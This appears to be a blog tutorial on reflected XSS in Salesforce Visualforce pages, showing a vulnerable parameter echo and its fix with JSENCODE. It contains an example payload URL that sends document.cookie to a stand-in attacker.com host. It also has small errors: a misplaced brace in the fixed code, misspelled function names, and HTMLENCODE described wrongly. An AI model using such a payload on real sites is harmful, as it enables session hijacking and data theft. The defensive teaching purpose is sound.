Salesforce applications with security : Reflected XSS

XSS is also known as cross site scripting.  XSS allows a attackers to inject his code in client script.This is a web application vulnerabilities which allows a attackers to bypass the sharing rules . By doing this he can expose the sensitive data, session cookies etc. also.

Now coming back to the reflected XSS, it impacts the page while page is getting load. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page , in the script block we are fetching an Id Parameter
<apex:page>

<script>

var xssExample = '{!$CurrentPage.Parameters.id}' ;

</script>

</apex:page>

Now have a deep look:
Page is called as :
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page will be loaded it will be executed in following manner:
 var xssExample = '{!$CurrentPage.Parameters.id}' ;
putting the id value from the request parameter :
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attackers.com site.

To prevent from this , salesforce provides some encoding function for the those are available on Visualforce page like :etc.
JSENCODE, HTMLENCODE, JSINHTNLENCODE, URLENCODE etc.

So the code explained above can be  updated as :
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id})' ;

So the value fetching from the request parameter will be encoded now.
JSENCODE : To encode the properties in javascript.
HTMLENCODE: To encode the properties in javascript.
JSINHTNLENCODE: If calling a javascript method from HTML component and passing the properties.
URLENCODE:  If building a URL on page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.